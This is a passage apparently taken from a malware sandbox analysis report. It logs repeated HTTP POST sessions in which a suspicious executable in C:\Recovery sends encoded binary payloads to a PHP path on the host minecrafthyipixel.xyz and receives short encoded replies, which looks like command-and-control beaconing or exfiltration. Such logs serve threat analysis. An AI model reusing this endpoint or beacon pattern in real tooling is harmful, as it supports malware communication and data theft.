                                                                                                                                    Apr 19, 2024 13:42:41.532748938 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:42:41.637448072 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:41.637764931 CEST2512OUTData Raw: 57 5d 5e 58 5c 40 51 5e 5c 5e 59 59 57 51 58 52 54 52 5f 5f 54 55 53 57 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W]^X\@Q^\^YYWQXRTR__TUSW^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&%>5";7$#;$]>*8_%_<1! !>U++;^78:5$[. X =
                                                                                                                                    Apr 19, 2024 13:42:42.052294016 CEST619INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:42 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TNT5ghCjfWnYFyZrOPtQPoL7lu3bMEi4TajZah0T5KvAJaQKAq0PlhL9kdscxCF5ULX4AP4M7asoslDDyRT05lZova6rEZJF2sRt%2BUHtrSt93%2FhCP5%2FoPS9ruYsCfw42CZ5N9gbC264%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca1f5ef796783-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:42:42.052354097 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    14192.168.2.449761104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:42:42.281712055 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:42:42.386126041 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:42.386305094 CEST2512OUTData Raw: 52 5a 5e 59 59 40 51 59 5c 5e 59 59 57 53 58 53 54 54 5f 5c 54 59 53 5b 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RZ^YY@QY\^YYWSXSTT_\TYS[^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%]1>6! Z$V'08-)#^&/1(> ->8$"/ _/%$[. X 5
                                                                                                                                    Apr 19, 2024 13:42:42.751432896 CEST619INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:42 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wPu8zv8m95DpeHWUEED%2FFewSZxkrNMLPYGX%2BA5yCKKPIO2Jtjh%2Bys1mzANaLMytxPrnejmwpu6q6diB5Gfpr0o2EhqIZTLRJM4f8faNXiOaHQMQyVv0yLCi7Jclcm5waFtzWTQnBmBI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca1fa998044d5-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:42:42.751496077 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    15192.168.2.449762104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:42:42.983623981 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:42:43.087999105 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:43.088346004 CEST2512OUTData Raw: 57 55 5e 55 59 40 54 58 5c 5e 59 59 57 54 58 5c 54 50 5f 5f 54 5b 53 58 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WU^UY@TX\^YYWTX\TP__T[SX^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%2268$&38$%=8;%%82#2)*; #/,_.$[. X )
                                                                                                                                    Apr 19, 2024 13:42:43.444557905 CEST627INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:43 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D25yv%2FPJkIzZOT7N%2BXw%2FWvFZRY159wJ6zF7QphLUI24U9Ye7pl66v%2BdFHzbT4hE%2B87Bre8Go1YbQnimKzn9%2BJDBtzatLTNe3W8sw2tBAwh1DsOHPJ1j%2FMxnRL6JsGpzkAVXTuwC1k0Q%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca1fef99c69ed-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:42:43.444622040 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    16192.168.2.449763104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:42:43.673417091 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:42:43.777977943 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:43.778137922 CEST2512OUTData Raw: 52 5d 5e 5b 5c 44 51 5e 5c 5e 59 59 57 53 58 58 54 5a 5f 5a 54 59 53 5a 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: R]^[\DQ^\^YYWSXXTZ_ZTYSZ^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%]2>"<'\'85>;(%93&+&7.U*\ 095$[. X 5
                                                                                                                                    Apr 19, 2024 13:42:44.129538059 CEST617INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:44 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x20Wwpmov6Gf5LxbVz%2Bmrf2f1QwLtVTVlRGAXTV0Jh7BkqdXmUB0YvepVCtH7JnTr7LoFMQa8hZprhwrQjC0db8kJmywoUemcsAet14v9ky6tutPV%2B48Vp9NMihZ8Ey2EiDrpri2vrg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2034e39676f-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:42:44.129601002 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    17192.168.2.449764104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:42:44.655472040 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:42:44.761169910 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:44.766926050 CEST2512OUTData Raw: 57 5a 5e 5d 59 43 54 5f 5c 5e 59 59 57 56 58 5c 54 55 5f 59 54 5e 53 59 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WZ^]YCT_\^YYWVX\TU_YT^SY^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%_%>5X0]')V=7X&R%]1#">T>+$4< .$[. X !
                                                                                                                                    Apr 19, 2024 13:42:45.123068094 CEST627INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:45 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dy%2B0wXTrq3pvFSMpQbbQXJ%2FLqFRJgijakEnS6%2B2JjUao8AUU3%2FPF%2BvhG6C%2FCj9LIP4ioXRizSMkFhHwJk7Gm3ABXmNGhfl0lwZ1seOFKZEnb%2F177NGDMwKhQyJu8SzglnoTQymbGU0s%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2096f4d457e-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:42:45.123131990 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    18192.168.2.449765104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:42:46.594906092 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2180
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:42:46.699615002 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:46.699899912 CEST2180OUTData Raw: 57 5c 5e 5b 5c 40 54 5a 5c 5e 59 59 57 57 58 59 54 52 5f 5a 54 5d 53 58 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W\^[\@TZ\^YYWWXYTR_ZT]SX^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%2.!54$3'^'=>$1$S%8-7"T*7[#Z0/5$[. X -
                                                                                                                                    Apr 19, 2024 13:42:46.957077980 CEST776INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:46 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OYWnPkQ3zlvpRQaX%2BiOhg9UHCPin62n6Vw9%2Ffkr4oOZJNrSNNe%2F9tTm%2B%2BAYQpTR%2BvQEraVqxz1obWCuc8NBX26XMkkZsEAUrlz%2FsfUJ8dzm9l6Sw4UGum63z4ouFyLcYVXcqzSwpnFc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca215884144f7-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 39 38 0d 0a 01 15 24 59 27 08 35 01 21 5c 2c 01 2b 23 29 02 3d 27 2e 06 2a 29 25 14 37 03 30 52 2f 29 2b 04 3e 3b 08 5d 31 20 32 0e 27 04 2c 53 31 1a 21 59 00 1a 3a 04 20 3c 0c 03 39 00 2d 58 28 57 22 03 37 32 20 07 2b 2d 21 51 20 16 3f 5e 28 2d 22 0f 2f 06 2f 0a 3c 01 3a 06 2f 24 36 14 21 2b 2c 52 09 12 25 55 3c 06 23 02 27 30 2d 50 37 22 37 00 28 06 32 5c 27 5d 2c 12 31 33 0a 14 2d 22 2d 09 26 2e 39 55 3e 3a 24 54 34 12 08 08 25 2e 2e 5e 2c 0c 2b 48 05 30 54 57 0d 0a
                                                                                                                                    Data Ascii: 98$Y'5!\,+#)='.*)%70R/)+>;]1 2',S1!Y: <9-X(W"72 +-!Q ?^(-"//<:/$6!+,R%U<#'0-P7"7(2\'],13-"-&.9U>:$T4%..^,+H0TW
                                                                                                                                    Apr 19, 2024 13:42:46.957139015 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    19192.168.2.449766104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:42:46.720484972 CEST362OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:42:46.825110912 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:46.825397968 CEST2512OUTData Raw: 57 5f 5b 5e 59 40 51 5f 5c 5e 59 59 57 53 58 58 54 55 5f 5b 54 5b 53 5c 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W_[^Y@Q_\^YYWSXXTU_[T[S\^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&1-"+'#;[3>^<'),181#=*8;_"/?9$[. X 5
                                                                                                                                    Apr 19, 2024 13:42:47.097349882 CEST615INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:47 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KDgboZgJgqQvTU62ZGNFnhxAY6yy4xvDJGk8y53q7lafVFpBfmnmiQtAhCMjwJwhAY7A5IW9ZYLvDbjfzE0bgsjdiiqVzmKzTFPRHf31B0Ak0iQ9DrpeI3vT7WhxpZVKdiKvp9Rv%2BCk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2165feeb06a-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:42:47.097381115 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    20192.168.2.449767104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:42:47.326900959 CEST362OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:42:47.431791067 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:47.435801983 CEST2512OUTData Raw: 57 5d 5b 59 59 46 54 5d 5c 5e 59 59 57 55 58 5e 54 51 5f 58 54 59 53 56 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W][YYFT]\^YYWUX^TQ_XTYSV^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&2-"S ;<X& ^0("=^8%*?&14"6*< /8-5$[. X -
                                                                                                                                    Apr 19, 2024 13:42:47.804562092 CEST623INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:47 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OVEcZxch1zseBaYWkGpXpImvqAlsd1G0j6QZ9pGaH%2BnVDZoI5VtFwr27Jrob36NXDgWS72Hdy2B8ULuotdBR6AzTeFkp41o%2BdVYNTBDSZ%2F6zWB6FN4%2Bf4n3urw7ReFjjJl%2FzgGbMYhw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca21a280cb0b8-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:42:47.804625988 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    21192.168.2.449768104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:42:48.049266100 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:42:48.153839111 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:48.154284000 CEST2512OUTData Raw: 57 5a 5e 5f 59 43 51 5f 5c 5e 59 59 57 52 58 5a 54 56 5f 5d 54 5c 53 5b 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WZ^_YCQ_\^YYWRXZTV_]T\S[^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%[&>6;Y$ ;^'+&)']1_3&; 2*>;_409$[. X 1
                                                                                                                                    Apr 19, 2024 13:42:48.517513990 CEST625INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:48 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5JoJ8AKB5MLXFb7liyceJ4TyTFetIpS%2FmDj8cjHR5a0Ebq2M%2BeM9REHq7%2B3NiOOYqERoTo9p8%2BLuaXT4GUGO4n9B5t2PSyNanVaoZsETtT8v%2B4EHJBx2SUKEwdH9Dud51PW4%2Bn2UDVU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca21ea8e244f7-ATL
